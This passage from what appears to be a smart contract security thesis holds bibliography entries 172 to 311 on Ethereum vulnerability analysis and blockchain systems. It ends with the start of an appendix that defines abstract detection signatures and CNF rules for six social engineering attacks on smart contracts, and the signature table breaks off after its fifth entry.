[172] Abdul Ghaffar Khan, Amjad Hussain Zahid, Muzammil Hussain, and Usama Riaz. Security
      of cryptocurrency using hardware wallet and qr code. In 2019 International Conference on
      Innovative Computing (ICIC), pages 1–10. IEEE, 2019.
[173] Aggelos Kiayias, Alexander Russell, Bernardo David, and Roman Oliynykov. Ouroboros:
      A provably secure proof-of-stake blockchain protocol. In Annual International Cryptology
      Conference, pages 357–388. Springer, 2017.
[174] James C King. Symbolic execution and program testing. Communications of the ACM,
      19(7):385–394, 1976.
[175] Eleftherios Kokoris-Kogias, Philipp Jovanovic, Linus Gasser, Nicolas Gailly, Ewa Syta, and
      Bryan Ford. Omniledger: A secure, scale-out, decentralized ledger via sharding. In 2018
      IEEE Symposium on Security and Privacy (SP), pages 583–598. IEEE, 2018.
[176] Aashish Kolluri, Ivica Nikolic, Ilya Sergey, Aquinas Hobor, and Prateek Saxena. Exploiting
      the laws of order in smart contracts. In Proceedings of the 28th ACM SIGSOFT international
      symposium on software testing and analysis, pages 363–373, 2019.
[177] Jaturong Kongmanee, Phongphun Kijsanayothin, and Rattikorn Hewett. Securing smart
      contracts in blockchain. In 2019 34th IEEE/ACM International Conference on Automated
      Software Engineering Workshop (ASEW), pages 69–76. IEEE, 2019.
[178] Johannes Krupp and Christian Rossow. teether: Gnawing at ethereum to automatically ex-
      ploit smart contracts. In 27th USENIX Security Symposium (USENIX Security 18), pages
      1317–1333, 2018.
[179] Murat Kuzlu, Manisa Pipattanasomporn, Levent Gurses, and Saifur Rahman. Performance
      analysis of a hyperledger fabric blockchain framework: throughput, latency and scalability.
      In 2019 IEEE international conference on blockchain (Blockchain), pages 536–540. IEEE,
      2019.
[180] Yujin Kwon, Jian Liu, Minjeong Kim, Dawn Song, and Yongdae Kim. Impossibility of full
      decentralization in permissionless blockchains. In Proceedings of the 1st ACM Conference
      on Advances in Financial Technologies, 2019.
[181] Heiner Lasi, Peter Fettke, Hans-Georg Kemper, Thomas Feld, and Michael Hoffmann. In-
      dustry 4.0. Business & information systems engineering, 6(4):239–242, 2014.
[182] Ton Chanh Le, Lei Xu, Lin Chen, and Weidong Shi. Proving conditional termination for
      smart contracts. In Proceedings of the 2nd ACM Workshop on Blockchains, Cryptocurren-
      cies, and Contracts, pages 57–59, 2018.
[183] Ao Li, Jemin Andrew Choi, and Fan Long. Securing smart contract with runtime validation.
      In Proceedings of the 41st ACM SIGPLAN Conference on Programming Language Design
      and Implementation, pages 438–453, 2020.
[184] Chenning Li, Zhichao Cao, and Yunhao Liu. Deep ai enabled ubiquitous wireless sensing:
      A survey. ACM Computing Surveys (CSUR), 54(2):1–35, 2021.
[185] Xiaoqi Li, Peng Jiang, Ting Chen, Xiapu Luo, and Qiaoyan Wen. A survey on the security
      of blockchain systems. Future Generation Computer Systems, 107:841–853, 2020.
[186] Xiaoyu Li, Cheng Su, Yan Xiong, Wenchao Huang, and Wansen Wang. Formal verification
      of bnb smart contract. In 2019 5th International Conference on Big Data Computing and
      Communications (BIGCOM), pages 74–78. IEEE, 2019.
[187] Yue Li. Finding concurrency exploits on smart contracts. In 2019 IEEE/ACM 41st Interna-
      tional Conference on Software Engineering: Companion Proceedings (ICSE-Companion),
      pages 144–146. IEEE, 2019.
[188] Yue Li, Han Liu, Zhiqiang Yang, Qian Ren, Lei Wang, and Bangdao Chen. Safepay on
      ethereum: A framework for detecting unfair payments in smart contracts. In 2020 IEEE
      40th International Conference on Distributed Computing Systems (ICDCS), pages 1219–
      1222. IEEE, 2020.
[189] Jian-Wei Liao, Tsung-Ta Tsai, Chia-Kang He, and Chin-Wei Tien. Soliaudit: Smart contract
      vulnerability assessment based on machine learning and fuzz testing. In 2019 Sixth Inter-
      national Conference on Internet of Things: Systems, Management and Security (IOTSMS),
      pages 458–465. IEEE, 2019.
[190] Jun Lin, Zhiqi Shen, Anting Zhang, and Yueting Chai. Blockchain and iot based food trace-
      ability for smart agriculture. In Proceedings of the 3rd International Conference on Crowd
      Science and Engineering, pages 1–6, 2018.
[191] Shlomi Linoy, Suprio Ray, and Natalia Stakhanova. Etherprov: provenance-aware detection,
      analysis, and mitigation of ethereum smart contract security issues.
[192] Changwei Liu and Sid Stamm. Fighting unicode-obfuscated spam. In Proceedings of the
      anti-phishing working groups 2nd annual eCrime researchers summit, pages 45–59, 2007.
[193] Chao Liu, Han Liu, Zhao Cao, Zhong Chen, Bangdao Chen, and Bill Roscoe. Reguard: find-
      ing reentrancy bugs in smart contracts. In 2018 IEEE/ACM 40th International Conference
      on Software Engineering: Companion (ICSE-Companion), pages 65–68. IEEE, 2018.
[194] Han Liu, Chao Liu, Wenqi Zhao, Yu Jiang, and Jiaguang Sun. S-gram: towards semantic-
      aware security auditing for ethereum smart contracts. In 2018 33rd IEEE/ACM International
      Conference on Automated Software Engineering (ASE), pages 814–819. IEEE, 2018.
[195] Hong Liu, Huansheng Ning, Qitao Mu, Yumei Zheng, Jing Zeng, Laurence T Yang, Runhe
      Huang, and Jianhua Ma. A review of the smart world. Future generation computer systems,
      96:678–691, 2019.
[196] Ye Liu, Yi Li, Shang-Wei Lin, and Qiang Yan. Modcon: A model-based testing platform
      for smart contracts. In Proceedings of the 28th ACM Joint Meeting on European Software
      Engineering Conference and Symposium on the Foundations of Software Engineering, pages
      1601–1605, 2020.
[197] Zhenguang Liu, Peng Qian, Xiang Wang, Lei Zhu, Qinming He, and Shouling Ji. Smart
      contract vulnerability detection: From pure neural network to interpretable graph feature
      and expert pattern fusion. arXiv preprint arXiv:2106.09282, 2021.
[198] Ning Lu, Bin Wang, Yongxin Zhang, Wenbo Shi, and Christian Esposito. Neucheck: A more
      practical ethereum smart contract security analysis tool. Software: Practice and Experience,
      2019.
[199] Oliver Lutz, Huili Chen, Hossein Fereidooni, Christoph Sendner, Alexandra Dmitrienko,
      Ahmad Reza Sadeghi, and Farinaz Koushanfar. Escort: Ethereum smart contracts vul-
      nerability detection using deep neural network and transfer learning. arXiv preprint
      arXiv:2103.12607, 2021.
[200] Loi Luu, Duc-Hiep Chu, Hrishi Olickel, Prateek Saxena, and Aquinas Hobor. Making smart
      contracts smarter. In Proceedings of the 2016 ACM SIGSAC conference on computer and
      communications security, pages 254–269, 2016.
[201] M-Lab. Measurement lab speed test. https://speed.measurementlab.net, 2019. Accessed:
      2020-04-03.
[202] Fuchen Ma, Ying Fu, Meng Ren, Wanting Sun, Zhe Liu, Yu Jiang, Jun Sun, and Jiaguang
      Sun. Gasfuzz: Generating high gas consumption inputs to avoid out-of-gas vulnerability.
      arXiv preprint arXiv:1910.02945, 2019.
[203] Fuchen Ma, Ying Fu, Meng Ren, Mingzhe Wang, Yu Jiang, Kaixiang Zhang, Huizhong Li,
      and Xiang Shi. Evm*: from offline detection to online reinforcement for ethereum virtual
      machine. In 2019 IEEE 26th International Conference on Software Analysis, Evolution and
      Reengineering (SANER), pages 554–558. IEEE, 2019.
[204] Matteo Marescotti, Rodrigo Otoni, Leonardo Alt, Patrick Eugster, Antti EJ Hyvärinen, and
      Natasha Sharygina. Accurate smart contract verification through direct modelling. In In-
      ternational Symposium on Leveraging Applications of Formal Methods, pages 178–194.
      Springer, 2020.
[205] Anastasia Mavridou and Aron Laszka. Designing secure ethereum smart contracts: A finite
      state machine based approach. In International Conference on Financial Cryptography and
      Data Security, pages 523–540. Springer, 2018.
[206] Anastasia Mavridou, Aron Laszka, Emmanouela Stachtiari, and Abhishek Dubey. Verisolid:
      Correct-by-design smart contracts for ethereum. In International Conference on Financial
      Cryptography and Data Security, pages 446–465. Springer, 2019.
[207] Muhammad Izhar Mehar, Charles Louis Shier, Alana Giambattista, Elgar Gong, Gabrielle
      Fletcher, Ryan Sanayhie, Henry M Kim, and Marek Laskowski. Understanding a revolu-
      tionary and flawed grand experiment in blockchain: the dao attack. Journal of Cases on
      Information Technology (JCIT), 21(1):19–32, 2019.
[208] Simon Meier, Benedikt Schmidt, Cas Cremers, and David Basin. The tamarin prover for
      the symbolic analysis of security protocols. In International Conference on Computer Aided
      Verification, pages 696–701. Springer, 2013.
[209] Marvin Lee Minsky. Computation. Prentice-Hall Englewood Cliffs, 1967.
[210] Ricky KP Mok, Xiapu Luo, Edmond WW Chan, and Rocky KC Chang. Qdash: a qoe-aware
      dash system. In Proceedings of the 3rd Multimedia Systems Conference, pages 11–22, 2012.
[211] Andreas F. Molisch. Wireless Communications. Second Edition, chapter 1, page 14. John
      Wiley & Sons, 2011.
[212] Pouyan Momeni, Yu Wang, and Reza Samavi. Machine learning model for smart contracts
      security analysis. In 2019 17th International Conference on Privacy, Security and Trust
      (PST), pages 1–6. IEEE, 2019.
[213] Md Moniruzzaman, Farida Chowdhury, and Md Sadek Ferdous. Examining usability is-
      sues in blockchain-based cryptocurrency wallets. In Cyber Security and Computer Science:
      Second EAI International Conference, ICONCS 2020, Dhaka, Bangladesh, February 15-16,
      2020, Proceedings 2, pages 631–643. Springer, 2020.
[214] Mark Mossberg, Felipe Manzano, Eric Hennenfent, Alex Groce, Gustavo Grieco, Josselin
      Feist, Trent Brunson, and Artem Dinaburg. Manticore: A user-friendly symbolic execution
      framework for binaries and smart contracts. In 2019 34th IEEE/ACM International Confer-
      ence on Automated Software Engineering (ASE), pages 1186–1189. IEEE, 2019.
[215] Bernhard Mueller. Smashing ethereum smart contracts for fun and real profit. In 9th Annual
      HITB Security Conference (HITBSecConf), volume 54, 2018.
[216] Satoshi Nakamoto. Bitcoin: A peer-to-peer electronic cash system. Technical report, 2019.
[217] Zeinab Nehai, Pierre-Yves Piriou, and Frederic Daumas. Model-checking of smart con-
      tracts. In 2018 IEEE International Conference on Internet of Things (iThings) and IEEE
      Green Computing and Communications (GreenCom) and IEEE Cyber, Physical and Social
      Computing (CPSCom) and IEEE Smart Data (SmartData), pages 980–987. IEEE, 2018.
[218] Ajaya Neupane, Md Lutfor Rahman, Nitesh Saxena, and Leanne Hirshfield. A multi-modal
      neuro-physiological study of phishing detection and malware warnings. In Proceedings of
      the 22nd ACM SIGSAC Conference on Computer and Communications Security, pages 479–
      491, 2015.
[219] Ajaya Neupane, Nitesh Saxena, Keya Kuruvilla, Michael Georgescu, and Rajesh K Kana.
      Neural signatures of user-centered security: An fmri study of phishing, and malware warn-
      ings. In NDSS, 2014.
[220] Tai D Nguyen, Long H Pham, and Jun Sun. sguard: Towards fixing vulnerable smart
      contracts automatically. arXiv preprint arXiv:2101.01917, 2021.
[221] Tai D Nguyen, Long H Pham, Jun Sun, Yun Lin, and Quang Tran Minh. sfuzz: An effi-
      cient adaptive fuzzer for solidity smart contracts. In Proceedings of the ACM/IEEE 42nd
      International Conference on Software Engineering, pages 778–788, 2020.
[222] Yuandong Ni, Chao Zhang, and Tingting Yin. A survey of smart contract vulnerability
      research. Journal of Cyber Security, 5(3):78–99, 2020.
[223] Ivica Nikolić, Aashish Kolluri, Ilya Sergey, Prateek Saxena, and Aquinas Hobor. Finding
      the greedy, prodigal, and suicidal contracts at scale. In Proceedings of the 34th Annual
      Computer Security Applications Conference, pages 653–663, 2018.
[224] Robert Norvill, Beltran Borja Fiz Pontiveros, Radu State, and Andrea Cullen. Visual emula-
      tion for ethereum’s virtual machine. In NOMS 2018-2018 IEEE/IFIP Network Operations
      and Management Symposium, pages 1–4. IEEE, 2018.
[225] Ookla, LLC. Ookla lab speed test. https://www.speedtest.net, 2019. Accessed: 2020-04-03.
[226] Santiago Palladino. The parity wallet hack explained. https://blog.zeppelin.solutions/
      on-the-parity-wallet-multisig-hack-405a8c12e8f7, 2017.
[227] Daejun Park, Yi Zhang, Manasvi Saxena, Philip Daian, and Grigore Roşu. A formal verifi-
      cation tool for ethereum vm bytecode. In ACM ESEC/FSE, pages 912–915, 2018.
[228] Daniel Perez and Ben Livshits. Smart contract vulnerabilities: Vulnerable does not imply
      exploited. In 30th USENIX Security Symposium (USENIX Security 21), 2021.
[229] Daniel Perez and Benjamin Livshits. Smart contract vulnerabilities: Does anyone care?
      arXiv preprint arXiv:1902.06710, 2019.
[230] Anton Permenev, Dimitar Dimitrov, Petar Tsankov, Dana Drachsler-Cohen, and Martin
      Vechev. Verx: Safety verification of smart contracts. In 2020 IEEE Symposium on Secu-
      rity and Privacy (SP), pages 1661–1677. IEEE, 2020.
[231] Joseph Poon and Vitalik Buterin. Plasma: Scalable autonomous smart contracts. White
      paper, pages 1–47, 2017.
[232] Joseph Poon and Thaddeus Dryja. The bitcoin lightning network: Scalable off-chain instant
      payments, 2016.
[233] Purathani Praitheeshan, Lei Pan, Jiangshan Yu, Joseph Liu, and Robin Doss. Security
      analysis methods on ethereum smart contract vulnerabilities: a survey. arXiv preprint
      arXiv:1908.08605, 2019.
[234] Ravi Prasad, Constantinos Dovrolis, Margaret Murray, and KC Claffy. Bandwidth estima-
      tion: metrics, measurement techniques, and tools. IEEE network, 17(6):27–35, 2003.
[235] Kaihua Qin, Liyi Zhou, and Arthur Gervais. Quantifying blockchain extractable value: How
      dark is the forest? arXiv preprint arXiv:2101.05511, 2021.
[236] Lijin Quan, Lei Wu, and Haoyu Wang. Evulhunter: detecting fake transfer vulnerabilities
      for eosio’s smart contracts at webassembly-level. arXiv preprint arXiv:1906.10362, 2019.
[237] Aravind Ramachandran and Murat Kantarcioglu. Smartprovenance: a distributed,
      blockchain based dataprovenance system. In Proceedings of the Eighth ACM Conference
      on Data and Application Security and Privacy, pages 35–42, 2018.
[238] Ana Reyna, Cristian Martín, Jaime Chen, Enrique Soler, and Manuel Díaz. On blockchain
      and its integration with iot. challenges and opportunities. Future generation computer sys-
      tems, 88:173–190, 2018.
[239] Hubert Ritzdorf, Karl Wüst, Arthur Gervais, Guillaume Felley, and Srdjan Capkun. Tls-n:
      Non-repudiation over tls enabling ubiquitous content signing. In NDSS, 2018.
[240] Michael Rodler, Wenting Li, Ghassan O Karame, and Lucas Davi. Sereum: Protecting
      existing smart contracts against re-entrancy attacks. arXiv preprint arXiv:1812.05934, 2018.
[241] Michael Rodler, Wenting Li, Ghassan O Karame, and Lucas Davi. Evmpatch: timely and
      automated patching of ethereum smart contracts. In 30th USENIX Security Symposium
      (USENIX Security 21), 2021.
[242] Jan Rubin. Clipsa - Multipurpose password stealer. https://decoded.avast.io/janrubin/
      clipsa-multipurpose-password-stealer/, 2019. Accessed: 2021-04-12.
[243] Sanjay K Sahay, Ashu Sharma, and Hemant Rathore. Evolution of malware and its detection
      techniques. In Information and Communication Technology for Sustainable Development,
      pages 139–150. Springer, 2020.
[244] Justin Sahs and Latifur Khan. A machine learning approach to android malware detection.
      In 2012 European Intelligence and Security Informatics Conference, pages 141–147. IEEE,
      2012.
[245] Noama Fatima Samreen and Manar H. Alalfi. A survey of security vulnerabilities in
      ethereum smart contracts. CoRR, abs/2105.06974, 2021.
[246] Manuel San Pedro, Victor Servant, and Charles Guillemet. Side-channel assessment of open
      source hardware wallets. IACR Cryptol. ePrint Arch., 2019.
[247] Mahmoud Sayrafiezadeh. The birthday problem revisited. Mathematics Magazine,
      67(3):220–223, 1994.
[248] Clara Schneidewind, Ilya Grishchenko, Markus Scherer, and Matteo Maffei. ethor: Practical
      and provably sound static analysis of ethereum smart contracts. In ACM CCS, 2020.
[249] Franklin Schrans, Susan Eisenbach, and Sophia Drossopoulou. Writing safe smart contracts
      in flint. In Conference companion of the 2nd international conference on art, science, and
      engineering of programming, pages 218–219, 2018.
[250] Amazon Web Services. Alexa top sites.
      https://docs.aws.amazon.com/AlexaTopSites/latest/MakingRequestsChapter.html.
      Accessed: 2020-04-03.
[251] Pradip Kumar Sharma and Jong Hyuk Park. Blockchain based hybrid network architecture
      for the smart city. Future Generation Computer Systems, 86:650–655, 2018.
[252] Fengrui Shi, Zhijin Qin, and Julie A McCann. Oppay: Design and implementation of a
      payment system for opportunistic data services. In 2017 IEEE 37th International Conference
      on Distributed Computing Systems (ICDCS), pages 1618–1628. IEEE, 2017.
[253] Yonghee Shin and Laurie Williams. An empirical model to predict security vulnerabilities
      using code complexity metrics. In Proceedings of the Second ACM-IEEE international sym-
      posium on Empirical software engineering and measurement, pages 315–317, 2008.
[254] Yonghee Shin and Laurie Williams. Is complexity really the enemy of software security? In
      Proceedings of the 4th ACM workshop on Quality of protection, pages 47–50, 2008.
[255] MacKenzie Sigalos. Bug puts $162 million up for grabs, says founder of defi platform
      compound. https://www.cnbc.com/2021/10/03/162-million-up-for-grabs-after-bug-in-defi-
      protocol-compound-.html, 2021.
[256] Christopher Signer. Gas cost analysis for ethereum smart contracts. Master’s thesis, ETH
      Zurich, Department of Computer Science, 2018.
[257] Lenin Singaravelu, Calton Pu, Hermann Härtig, and Christian Helmuth. Reducing tcb com-
      plexity for security-sensitive applications: Three case studies. In Proceedings of the 1st
      ACM SIGOPS/EuroSys European Conference on Computer Systems 2006, pages 161–174,
      2006.
[258] Amritraj Singh, Reza M Parizi, Qi Zhang, Kim-Kwang Raymond Choo, and Ali Dehghan-
      tanha. Blockchain smart contracts formalization: Approaches and challenges to address
      vulnerabilities. Computers & Security, 88:101654, 2020.
[259] Saurabh Singh, Pradip Kumar Sharma, Byungun Yoon, Mohammad Shojafar, Gi Hwan Cho,
      and In-Ho Ra. Convergence of blockchain and artificial intelligence in iot network for the
      sustainable smart city. Sustainable Cities and Society, 63:102364, 2020.
[260] Sunbeom So, Seongjoon Hong, and Hakjoo Oh. Smartest: Effectively hunting vulnerable
      transaction sequences in smart contracts through language model-guided symbolic execution.
      In 30th USENIX Security Symposium (USENIX Security 21), 2021.
[261] Sunbeom So, Myungho Lee, Jisu Park, Heejo Lee, and Hakjoo Oh. Verismart: A highly
      precise safety verifier for ethereum smart contracts. In 2020 IEEE Symposium on Security
      and Privacy (SP), pages 1678–1694. IEEE, 2020.
[262] Yonatan Sompolinsky, Yoad Lewenberg, and Aviv Zohar. Spectre: A fast and scalable cryp-
      tocurrency protocol. IACR Cryptol. ePrint Arch., 2016:1159, 2016.
[263] Jon Stephens, Kostas Ferles, Benjamin Mariano, Shuvendu Lahiri, and Isil Dillig. Smart-
      pulse: Automated checking of temporal properties in smart contracts. In IEEE S&P, 2021.
[264] Liya Su, Xinyue Shen, Xiangyu Du, Xiaojing Liao, XiaoFeng Wang, Luyi Xing, and Baoxu
      Liu. Evil under the sun: Understanding and discovering attacks on ethereum decentralized
      applications. In 30th USENIX Security Symposium (USENIX Security 21), 2021.
[265] Nick Szabo. Smart contracts: building blocks for digital markets. EXTROPY: The Journal
      of Transhumanist Thought, (16), 18:2, 1996.
[266] Janos Szurdi, Balazs Kocso, Gabor Cseh, Jonathan Spring, Mark Felegyhazi, and Chris
      Kanich. The long “taile” of typosquatting domain names. In 23rd USENIX Security
      Symposium (USENIX Security 14), pages 191–206, 2014.
[267] Sergei Tikhomirov, Ekaterina Voskresenskaya, Ivan Ivanitskiy, Ramil Takhaviev, Evgeny
      Marchenko, and Yaroslav Alexandrov. Smartcheck: Static analysis of ethereum smart con-
      tracts. In Proceedings of the 1st International Workshop on Emerging Trends in Software
      Engineering for Blockchain, pages 9–16, 2018.
[268] Palina Tolmach, Yi Li, Shang-Wei Lin, Yang Liu, and Zengxiang Li. A survey of smart
      contract formal specification and verification. ACM Computing Surveys (CSUR), 54(7):1–
      38, 2021.
[269] Christof Ferreira Torres, Julian Schütte, and Radu State. Osiris: Hunting for integer bugs in
      ethereum smart contracts. In Proceedings of the 34th Annual Computer Security Applications
      Conference, pages 664–676, 2018.
[270] Christof Ferreira Torres, Mathis Steichen, et al. The art of the scam: Demystifying honeypots
      in ethereum smart contracts. In 28th USENIX Security Symposium (USENIX Security 19),
      pages 1591–1607, 2019.
[271] Petar Tsankov, Andrei Dan, Dana Drachsler-Cohen, Arthur Gervais, Florian Buenzli, and
      Martin Vechev. Securify: Practical security analysis of smart contracts. In Proceedings
      of the 2018 ACM SIGSAC Conference on Computer and Communications Security, pages
      67–82, 2018.
[272] Anna Vacca, Andrea Di Sorbo, Corrado A. Visaggio, and Gerardo Canfora. A systematic
      literature review of blockchain and smart contract development: Techniques, tools, and open
      challenges. Journal of Systems and Software, 174:110891, 2021.
[273] Amber Van Der Heijden and Luca Allodi. Cognitive triaging of phishing attacks. In 28th
      USENIX Security Symposium (USENIX Security 19), pages 1309–1326, 2019.
[274] Anqi Wang, Hao Wang, Bo Jiang, and Wing Kwong Chan. Artemis: An improved smart
      contract verification tool for vulnerability detection. In 2020 7th International Conference
      on Dependable Systems and Their Applications (DSA), pages 173–181. IEEE, 2020.
[275] Baocheng Wang, Jiawei Sun, Yunhua He, Dandan Pang, and Ningxiao Lu. Large-scale
      election based on blockchain. Procedia Computer Science, 129:234–237, 2018.
[276] Bin Wang, Han Liu, Chao Liu, Zhiqiang Yang, Qian Ren, Huixuan Zheng, and Hong Lei.
      Blockeye: Hunting for defi attacks on blockchain. In 2021 IEEE/ACM 43rd International
      Conference on Software Engineering: Companion Proceedings (ICSE-Companion), pages
      17–20. IEEE, 2021.
[277] Dong Wang, Bo Jiang, and WK Chan. Wana: Symbolic execution of wasm bytecode for
      cross-platform smart contract vulnerability detection. arXiv preprint arXiv:2007.15510,
      2020.
[278] Haijun Wang, Yi Li, Shang-Wei Lin, Lei Ma, and Yang Liu. Vultron: catching vulnera-
      ble smart contracts once and for all. In 2019 IEEE/ACM 41st International Conference on
      Software Engineering: New Ideas and Emerging Results (ICSE-NIER), pages 1–4. IEEE,
      2019.
[279] Jiaping Wang and Hao Wang. Monoxide: Scale out blockchains with asynchronous
      consensus zones. In 16th USENIX Symposium on Networked Systems Design and
      Implementation (NSDI 19), pages 95–112, 2019.
[280] Shuai Wang, Chengyu Zhang, and Zhendong Su. Detecting nondeterministic payment
      bugs in ethereum smart contracts. Proceedings of the ACM on Programming Languages,
      3(OOPSLA):1–29, 2019.
[281] Wei Wang, Jingjing Song, Guangquan Xu, Yidong Li, Hao Wang, and Chunhua Su. Con-
      tractward: Automated vulnerability detection models for ethereum smart contracts. IEEE
      Transactions on Network Science and Engineering, 2020.
[282] Yajing Wang, Jingsha He, Nafei Zhu, Yuzi Yi, Qingqing Zhang, Hongyu Song, and Ruixin
      Xue. Security enhancement technologies for smart contracts in the blockchain: A survey.
      Transactions on Emerging Telecommunications Technologies, 32(12):e4341, 2021.
[283] Yuepeng Wang, Shuvendu K Lahiri, Shuo Chen, Rong Pan, Isil Dillig, Cody Born, Immad
      Naseer, and Kostas Ferles. Formal verification of workflow policies for smart contracts
      in azure blockchain. In Working Conference on Verified Software: Theories, Tools, and
      Experiments, pages 87–106. Springer, 2019.
[284] Zeli Wang, Hai Jin, Weiqi Dai, Kim-Kwang Raymond Choo, and Deqing Zou. Ethereum
      smart contract security research: survey and future research opportunities. Frontiers of
      Computer Science, 15(2):1–18, 2021.
[285] Colin Whittaker, Brian Ryner, and Marria Nazif. Large-scale automatic classification of
      phishing pages. In Proc. of NDSS, 2010.
[286] O Williams-Grut. Estonia is using the technology behind bitcoin to secure 1 million health
      records. Business Insider, 2016.
[287] Gavin Wood. Polkadot: Vision for a heterogeneous multi-chain framework. White Paper,
      2016.
[288] Gavin Wood et al. Ethereum: A secure decentralised generalised transaction ledger.
      Ethereum project yellow paper, 151(2014):1–32, 2014.
[289] Lei Wu, Siwei Wu, Yajin Zhou, Runhuai Li, Zhi Wang, Xiapu Luo, Cong Wang, and Kui
      Ren. Ethscope: A transaction-centric security analytics framework to detect malicious smart
      contracts on ethereum.
[290] Siwei Wu, Dabao Wang, Jianting He, Yajin Zhou, Lei Wu, Xingliang Yuan, Qinming He,
      and Kui Ren. Defiranger: Detecting price manipulation attacks on defi applications. arXiv
      preprint arXiv:2104.15068, 2021.
[291] Valentin Wüstholz and Maria Christakis. Harvey: A greybox fuzzer for smart contracts. In
      Proceedings of the 28th ACM Joint Meeting on European Software Engineering Conference
      and Symposium on the Foundations of Software Engineering, pages 1398–1409, 2020.
[292] Xinyu Xing, Jianxun Dang, Shivakant Mishra, and Xue Liu. A highly scalable bandwidth
      estimation of commercial hotspot access points. In 2011 Proceedings IEEE INFOCOM,
      pages 1143–1151, 2011.
[293] Wentian Yan, Jianbo Gao, Zhenhao Wu, Yue Li, Zhi Guan, Qingshan Li, and Zhong Chen.
      Eshield: protect smart contracts against reverse engineering. In Proceedings of the 29th
      ACM SIGSOFT International Symposium on Software Testing and Analysis, pages 553–556,
      2020.
[294] Zheng Yang and Hang Lei. Lolisa: Formal syntax and semantics for a subset of the solidity
      programming language. arXiv e-prints, pages arXiv–1803, 2018.
[295] Zhiqiang Yang, Han Liu, Yue Li, Huixuan Zheng, Lei Wang, and Bangdao Chen. Ser-
      aph: enabling cross-platform security analysis for evm and wasm smart contracts. In 2020
      IEEE/ACM 42nd International Conference on Software Engineering: Companion Proceed-
      ings (ICSE-Companion), pages 21–24. IEEE, 2020.
[296] Jiaming Ye, Mingliang Ma, Yun Lin, Yulei Sui, and Yinxing Xue. Clairvoyance: Cross-
      contract static analysis for detecting practical reentrancy vulnerabilities in smart contracts.
      In 2020 IEEE/ACM 42nd International Conference on Software Engineering: Companion
      Proceedings (ICSE-Companion), pages 274–275. IEEE, 2020.
[297] Haifeng Yu, Ivica Nikolić, Ruomu Hou, and Prateek Saxena. Ohie: Blockchain scaling
      made simple. In 2020 IEEE Symposium on Security and Privacy (SP), pages 90–105. IEEE,
      2020.
[298] Mahdi Zamani, Mahnush Movahedi, and Mariana Raykova. Rapidchain: Scaling blockchain
      via full sharding. In Proceedings of the 2018 ACM SIGSAC Conference on Computer and
      Communications Security, pages 931–948, 2018.
[299] Mengya Zhang, Xiaokuan Zhang, Yinqian Zhang, and Zhiqiang Lin. TXSPECTOR: Uncov-
      ering attacks in ethereum from transactions. In USENIX Security, 2020.
[300] Mian Zhang and Yuhong Ji. Blockchain for healthcare records: A data perspective. PeerJ
      Preprints, 6:e26942v1, 2018.
[301] Pengcheng Zhang, Feng Xiao, and Xiapu Luo. Soliditycheck: Quickly detecting smart
      contract problems through regular expressions. arXiv preprint arXiv:1911.09425, 2019.
[302] Pengcheng Zhang, Feng Xiao, and Xiapu Luo. A framework and dataset for bugs in ethereum
      smart contracts. In 2020 IEEE International Conference on Software Maintenance and Evo-
      lution (ICSME), pages 139–150. IEEE, 2020.
[303] Qingzhao Zhang, Yizhuo Wang, Juanru Li, and Siqi Ma. Ethploit: From fuzzing to efficient
      exploit generation against smart contracts. In 2020 IEEE 27th International Conference on
      Software Analysis, Evolution and Reengineering (SANER), pages 116–126. IEEE, 2020.
[304] William Zhang, Sebastian Banescu, Leonardo Pasos, Steven Stewart, and Vijay Ganesh.
      Mpro: Combining static and symbolic analysis for scalable testing of smart contract. In 2019
      IEEE 30th International Symposium on Software Reliability Engineering (ISSRE), pages
      456–462. IEEE, 2019.
[305] Yuyao Zhang, Siqi Ma, Juanru Li, Kailai Li, Surya Nepal, and Dawu Gu. Smartshield:
      Automatic smart contract protection made easy. In 2020 IEEE 27th International Conference
      on Software Analysis, Evolution and Reengineering (SANER), pages 23–34. IEEE, 2020.
[306] Ma Zhaofeng, Wang Lingyun, Wang Xiaochang, Wang Zhen, and Zhao Weizhe. Blockchain-
      enabled decentralized trust management and secure usage control of iot big data. IEEE
      Internet of Things Journal, 7(5):4000–4015, 2019.
[307] Ence Zhou, Song Hua, Bingfeng Pi, Jun Sun, Yashihide Nomura, Kazuhiro Yamashita, and
      Hidetoshi Kurihara. Security assurance for smart contract. In 2018 9th IFIP International
      Conference on New Technologies, Mobility and Security (NTMS), pages 1–5. IEEE, 2018.
[308] Qiheng Zhou, Huawei Huang, Zibin Zheng, and Jing Bian. Solutions to scalability of
      blockchain: A survey. IEEE Access, 8:16440–16455, 2020.
[309] Shunfan Zhou, Malte Möser, Zhemin Yang, Ben Adida, Thorsten Holz, Jie Xiang, Steven
      Goldfeder, Yinzhi Cao, Martin Plattner, Xiaojun Qin, et al. An ever-evolving game:
      Evaluation of real-world attacks and defenses in ethereum ecosystem. In 29th USENIX
      Security Symposium (USENIX Security 20), pages 2793–2810, 2020.
[310] Yi Zhou, Deepak Kumar, Surya Bakshi, Joshua Mason, Andrew Miller, and Michael Bailey.
      Erays: reverse engineering ethereum’s opaque smart contracts. In 27th USENIX Security
      Symposium (USENIX Security 18), pages 1371–1385, 2018.
[311] Weiqin Zou, David Lo, Pavneet Singh Kochhar, Xuan-Bach D Le, Xin Xia, Yang Feng,
      Zhenyu Chen, and Baowen Xu. Smart contract development: Challenges and opportunities.
      IEEE Transactions on Software Engineering, 2019.

                                                               APPENDIX
A: Attack Signatures
Table 8.1 lists all signatures that we use to detect potential social engineering attacks. From
these signatures, we derive a detection rule in conjunctive normal form (CNF) for each of the six
social engineering attacks. The rules are defined as follows:
               CNF(A1) = S1 ∧ (S2 ∨ S3 ∨ S4) ∧ S5
               CNF(A2) = (S2 ∨ S3 ∨ S4) ∧ S5 ∧ S6 ∧ (S7 ∨ S8) ∧ S9
               CNF(A3) = S5 ∧ S10 ∧ (S11 ∨ S12 ∨ S13 ∨ S14) ∧ S15
               CNF(A4) = S5 ∧ (S11 ∨ S12 ∨ S13 ∨ S14) ∧ S16 ∧ (S17 ∨ S18)
               CNF(A5) = S5 ∧ (S11 ∨ S12 ∨ S13 ∨ S14) ∧ (S19 ∨ S20) ∧ S21
               CNF(A6) = S5 ∧ (S11 ∨ S12 ∨ S13 ∨ S14) ∧ (S19 ∨ S20) ∧ S21 ∧ S22
Table 8.1: The full list of signatures used for automated detection of the six social engineering
attacks.
Symbol  Social Engineering Signature                                                                  Matching Attacks
S1      Non-constructor public or external function that alters an address variable                   A1
S2      Ether transfer with another Ether transfer in the call stack of the same transaction          A1, A2
S3      Ether transfer with call-with-value statement in the call stack of the same transaction       A1, A2
S4      Ether transfer with a token transfer in the call stack of the same transaction                A1, A2
S5      Smart contract has a payable function                                                         A1, A2, A3, A4, A5, A6
